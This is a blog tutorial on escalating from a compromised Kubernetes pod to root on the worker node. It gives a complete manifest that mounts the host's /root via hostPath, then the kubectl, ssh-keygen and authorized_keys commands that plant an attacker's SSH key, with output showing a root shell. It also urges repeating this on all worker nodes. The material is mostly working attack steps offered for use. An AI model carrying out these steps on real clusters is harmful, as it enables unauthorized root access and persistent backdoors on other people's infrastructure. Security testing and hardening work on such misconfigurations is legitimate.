Sunday, 8 April 2018

Hacking kubernetes part 2 - Getting root access to the worker node method 1 (By misconfiguration)

Hi everyone, in today's post I am going to explain how to get SSH access to the worker node where the pod is hosted. To follow along, you need to have completed part 1 of this tutorial, so if you have not read it yet, please do that first.
Now that you have an SSH connection into the hacked pod, let's try to mount the root volume of the worker node where this pod is running. You should be able to do this because it's allowed by default; if the sysadmin hasn't changed that, you are good to go. You need the file below and permission to launch pods from inside the hacked pod; again, if that pod is using the default service account, you should be able to do it.
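As an illustration (this manifest is hypothetical, not taken from any specific cluster), the kind of misconfiguration that makes this attack possible is the default service account being bound to an over-privileged role, for example:

```yaml
# Hypothetical misconfiguration: binding the "default" namespace's
# default service account to cluster-admin. With this in place, any
# pod using that service account can create pods, mount hostPath
# volumes, read secrets, and so on.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: overly-permissive-default-sa   # name is illustrative
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: default
    namespace: default
```

From inside a pod you can check what you are allowed to do with, for example, kubectl auth can-i create pods.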

File : deployment.yaml

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: task-pv-claim
spec:
  storageClassName: manual
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
---
kind: PersistentVolume
apiVersion: v1
metadata:
  name: task-pv-volume
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 1Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/root"
---
kind: Pod
apiVersion: v1
metadata:
  name: sshworker
spec:
  volumes:
    - name: task-pv-storage
      persistentVolumeClaim:
        claimName: task-pv-claim
  containers:
    - name: task-pv-container
      image: centos
      command: ["sleep"]
      args: ["66666"]
      volumeMounts:
        - mountPath: "/mnt/worker_node"
          name: task-pv-storage

From inside the hacked pod, apply this config file:

[root@hacked-6565c4954f-fnnvj /]# kubectl apply -f deployment.yaml

Now open a bash session on the pod that you just created from inside the hacked pod :

[root@hacked-6565c4954f-fnnvj /]# kubectl exec -ti sshworker /bin/bash

If everything went ok, you should be able to see the contents of the /root folder of the worker node.

[root@sshworker /]# cd /mnt/worker_node/
[root@sshworker worker_node]# 
[root@sshworker worker_node]# ls -la
total 8
drwxr-xr-x 3 root root    0 Apr  8 18:01 .
drwxr-xr-x 1 root root 4096 Apr  8 17:59 ..
-rw------- 1 root root 1737 Apr  8 17:56 .bash_history
drwx------ 2 root root    0 Apr  4 20:48 .ssh
-rw-r--r-- 1 root root    0 Apr  8 18:01 minikube_host

Now, inside the sshworker pod, install a few packages needed to generate the SSH keys:

[root@sshworker worker_node]# yum install -y -q openssh-clients.x86_64 openssh.x86_64
warning: /var/cache/yum/x86_64/7/base/packages/fipscheck-lib-1.4.1-6.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for fipscheck-lib-1.4.1-6.el7.x86_64.rpm is not installed
Public key for openssh-7.4p1-13.el7_4.x86_64.rpm is not installed
Importing GPG key 0xF4A80EB5:
 Userid     : "CentOS-7 Key (CentOS 7 Official Signing Key) "
 Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
 Package    : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
 From       : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
[root@sshworker worker_node]#

Now let's generate an SSH key pair:

[root@sshworker /]# ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''
[root@sshworker /]#

Check if there is a .ssh folder inside the mounted root; if there is, you don't have to do the following steps, but if there isn't, create it:

ls -la .ssh   # if it does not exist, then...
mkdir .ssh
chmod 700 .ssh
cd .ssh

Now add your public key (generated above as /tmp/hacker.key.pub) to the authorized_keys file:

cat /tmp/hacker.key.pub >> authorized_keys
chmod 600 authorized_keys
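The steps above can be sketched as a small script. This version is runnable anywhere: it uses a scratch directory standing in for the mounted worker-node root, and a placeholder public key instead of the real /tmp/hacker.key.pub.

```shell
# Stand-in for /mnt/worker_node (the real path comes from the
# volumeMount in deployment.yaml); a scratch dir keeps the sketch
# runnable outside the cluster.
WORKER_ROOT="$(mktemp -d)"
# Placeholder public key; in the attack this is the contents of
# /tmp/hacker.key.pub generated by ssh-keygen earlier.
PUBKEY='ssh-rsa AAAAB3NzaDEMOKEY hacker@sshworker'

mkdir -p "$WORKER_ROOT/.ssh"       # create .ssh only if missing
chmod 700 "$WORKER_ROOT/.ssh"      # sshd refuses looser permissions
printf '%s\n' "$PUBKEY" >> "$WORKER_ROOT/.ssh/authorized_keys"
chmod 600 "$WORKER_ROOT/.ssh/authorized_keys"
ls -la "$WORKER_ROOT/.ssh"
```

The strict 700/600 permissions matter: with default sshd settings (StrictModes yes), a world-readable authorized_keys file is silently ignored and the login will fail.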

Now get the IP address of the host where your pod is running. Run this from the hacked pod, where you have the kubectl command installed:

[root@hacked-6565c4954f-fnnvj /]# kubectl describe pod sshworker | grep Node:
Node:         k8sdemo/
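The Node: line has the form <node-name>/<node-ip>; if the IP part is empty (as on some minikube setups), kubectl get nodes -o wide also shows the node's internal IP. Assuming the IP is present, it can be split off like this (the address below is just a sample value, not from the original cluster):

```shell
# Sample "Node:" line; 192.168.99.100 is an assumed example IP.
line='Node:         k8sdemo/192.168.99.100'
node_ip="${line##*/}"   # strip everything up to the last '/'
echo "$node_ip"
```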

And now try to ssh into the host:

[root@sshworker .ssh]# ssh -i /tmp/hacker.key -o StrictHostKeyChecking=no root@
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

# id
uid=0(root) gid=0(root) groups=0(root)

And boom!!! You are on the worker node, and now you can repeat this for all the other worker nodes.
